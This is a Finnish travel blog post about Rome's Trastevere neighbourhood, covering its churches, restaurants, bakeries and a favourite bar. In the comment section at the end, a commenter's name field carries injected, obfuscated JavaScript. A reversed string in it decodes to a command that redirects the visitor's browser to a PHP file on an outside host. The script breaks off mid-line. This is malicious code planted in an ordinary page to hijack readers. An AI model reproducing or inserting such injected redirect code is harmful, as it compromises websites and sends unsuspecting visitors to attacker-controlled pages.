Image Alt

Blog

Trastevere – kylä keskellä Roomaa

Trasteveresta olen aikonut kirjoittaa postauksen jos toisenkin tämän blogin alusta asti, mutta jostain syystä se on aina vain jäänyt. Mutta nyt auringonoton kattoterassilla riippumatossa löhöilyn muiden töiden aiheuttaman pikkukiireen lomassa on sopiva aika luoda pieni yleiskatsaus Trastevereen, vaikka aihetta onkin vaikea rajata. Asuimme Trasteveressa kolmisen vuotta, joten tunnen sen parhaiten Rooman kaupunginosista. Tai oikeastaan Trastevere on syy, että tunnen historiallista keskustaa lukuun ottamatta aika huonosti Roomaa. Sieltä nimittäin oli ani harvoin syytä poistua mihinkään. Trasteveressa nimittäin löytyy kaikkea: kahviloita, hyviä ravintoloita, baareja, elävä piazza, pikkuputiikkeja, tori, nähtävyyksiä. Sama tosin pätee kaikkiin muihinkin Rooman kaupunginosiin, mutta Trastevere on lisäksi lähellä kaikkia Rooman päänähtävyyksiä. Sieltä on kävelymatka ja muutenkin hyvät yhteydet niin Vatikaaniin, Colosseumille kuin Pantheonille ja Navonan aukiollekin. Siksi suosittelenkin satunnaisille kyselijöille etsimään majoituspaikkaa juuri Trasteveresta. 

Trasteveren nimi tarkoittaa ‘Teveren (aka Tiber) toisella puolen’ ja sen vanhin ja viehättävin osa onkin Tiber-joen tuntumassa Viale Trasteveren molemmin puolin. Vaikka Trasteveren keskiaikaisilla mukulakivikaduilla nykyään vaeltaakin laumoittain turisteja – turistien määrä on mielestäni kasvanut jopa tässä parissa vuodessa, kun en itse enää asu hoodeilla – niin siellä voi kuitenkin nähdä oikeaakin elämää: pyykkejä kuivumassa katujen yllä, vanhoja miehiä pelaamassa korttia kadulle pystytetyn pöydän ääressä, lapsia leikkimässä ja pelaamassa jalkapalloa piazzalla. Se ei siis ole muuttunut ainakaan vielä lavastemaiseksi kulissiksi, olkoonkin, että suuri osa pyykeistä ja lapsista onkin meidän Trasteveressa asuvien ulkomaalaisten, mutta kyllä siellä vielä on paljon “kantaväestöäkin”, ikänsä Trasteveressa asuneita trasteverinoja, noantri (‘me muut’). Trastevere on vanha työläiskaupunginosa, josta tuli sitten taiteilijoiden suosima boheemi kaupunginosa ja sitten trendikäs mm. meidän expatien keskuudessa. Muistuttaa minua jostakin, mistäköhän 🙂 

Vaikka Trasteveren kapeat kadut ja jotenkin hehkuvat talot tekevät siitä mielestäni riittävästi käymisen ja näkemisen arvoisen paikan, niin toki siellä(kin) muutakin nähtävää on. Ehkä tunnetuin nähtävyys on keskuspiazzan reunalla oleva Santa Maria di Trasteveren kirkko, jota väitetään Rooman vanhimmaksi. Nykyisessä kirkossa tietenkään ei ole juurikaan jäämiä paikalla on joskus kristinuskon alkuaikoina olleesta kirkosta, mutta sisällä voi silti fiilistellä vaikka sillä ajatuksella, että kirkko on perustettu huhun mukaan Pyhän Pietarin mestauspaikalle. Kirkon edustalla olevat laatat ovat yhden tiedon mukaaan Caracallan kylpylästä, toisen Isiksen temppelistä. Vanhoja joka tapauksessa. Itse en paljon kirkkotaiteesta perusta, joten minusta viehättävintä kirkon sisällä on sen mosaiikkilattiat. No okei, kappelin 1200-luvulta peräisin oleva mosaiikki on myös upea. Kirkon hienoin fresko – tai oikeammin mosaiikki sekin –  on sen ulkopuolella oleva neitsyt Mariaa ja 10 neitsyttä lamppuineen esittävä teos.

Toiseksi nähtävyydeksi voin suositella Santa Cecilian kirkkoa. Siellä on viehättävä sisäpiha ja kaunis kirkko, mutta etenkin kannattaa ihailla Stefano Marendon patsasta Pyhästä Ceciliasta, jonka hän väitti olevan toisinto siitä, mitä omin silmin näki kun Cecilian hauta avattiin. Patsaassa on paljon samaa kuin Berninin töissä (joskus pitää ehkä tehdä juttu Berninin patsaistakin, ne on tällaisen taiteesta ymmärtämättömänkin mielestä kertakaikkisen upeita).  

Trasteveren ravintolatarjonta ulottuu Michelin-ravintoloista turistirysiin. Kasvaneista turistimääristä huolimatta Trastevere ei ole kuitenkaan muuttunut sellaiseksi kulinarismin autiomaaksi kuin esim. Vatikaanin ympäristö (valitettavasti) on, sillä sinne tulevat yhä monet paikallisetkin syömään, siis kauempaakin. Silloin, kun satunnainen tuttu tai tutun tuttu kyselee meiltä ravintolasuosituksia Roomasta, neuvomme löytyvät Trasteveresta. Se kun on niin hyvien yhteyksien päässä jne. Joten voinen jakaa nämä perussuositukseni täälläkin.

Le mani in pasta (suom. kädet taikinassa). Jos haluat alusta asti tehtyä käsin hyvää pastaa tai muutakin ruokaa, täältä sitä saa. Ei ihan edullisimmasta päästä, mutta ei ole vielä koskaan pettänyt. Suosittu, pöytävaraus tarpeen.

Spirito di vino (suom. viinin henki). Jos haluat ruokaelämyksen. Ei halpa, mutta oman rahan paikka kumminkin. Vain muutama pöytä ja vain varauksesta. Varauksen voi tehdä netitsekin. Pyydä käyntiä viinikellarissa: se on Colosseumiakin vanhempi

Marco G. Uudempaa italialaista keittiötä edustava ravintola, traditionaalisilla lisäyksillä. Hyvää ruokaa ja palvelua.

Kaikki yo. mainitut ravintolat on vähän keskihintaa kalliimpia. Mutta myös parempia. Mut kuten sanottu, Trasteveressa voi mennä melko huoletta lähes mihin tahansa esim. Via Moron ja sen sivukujien varrella olevaan ravintolaan, joista ei ehkä saa mitään suuria ruokaelämyksiä, mutta ihan hyvää perusroomalaista ruokaa joka tapauksessa. Lastemme suosikkipaikka oli Cave Canem lähellä keskuspiazzaa. Ja olenhan jo aikaisemminkin maininnut mm. huippuhyvän pizzeria Dar Poetan. Välttämään kehotan oikeastaan vain Piazza di Santa Marian reunustoilla olevia ravintoloita ja niitä paria, joissa on sisäänheittäjä. 

Lounaspaikoiksi suosittelen Antico fornoa Via Morolla. Parhaimpiin kuuluvat palapizzat Roomassa. Sieltä kannattaa ostaa myös Rooman parasta leipää, jos vaikka sattuu yöpymään apartementossa tai suunnittelemaan eväitä piknikiin. Sieltä kaikki lähiravintolatkin leipänsä ostavat.
Myös tavaratalo Oviessen (Viale Trastevere) vieressä oleva pasta-annoksia, pizzaa ja muuta sellaista oleva tavolo caldo on hyvä, jos haluaa syödä kuten paikalliset syövät. Eli kadulla seisten. Molemmat paikat supersuosittuja, joten kannattaa tähdätä ennen yhtä.

Näitä kuuluisia demokraattisia rigatoneja ei koskaan tullut testattua,

Pitäisi mainita myös lempibaarini Trasteveressa, perinteinen San Calisto, jossa yhä käy väkeä laidasta laitaan. Iltaisin se levittyy pitkälti yli terassin rajojen. Muutenkin Trasteveren iltaelämä on vilkas ja ansaitsee oman juttunsa. Teen sen jahka jonkinlaista iltaelämää on elämässäni havaittavissa.

Oikeastaan kaipaan Trasteverea juuri tällaisina lämpiminä kesäiltoina. Siellä oli niin helppoa lähteä ulos drinkille johonkin pienien kujien monista baareista. Ja nauttia sitten sen tai ravintola-aterian jälkeen jostakin Piazza di Santa Maria di Trasteveren monista katuesityksistä. Kuten huomaatte, Trasteveresta ammentaa vielä monta juttua tähänkin blogiin. Enhän vielä edes maininnut sen pikkuputiikkeja, enkä kahviloita.

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Eeva Pel<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod
Eeva Pel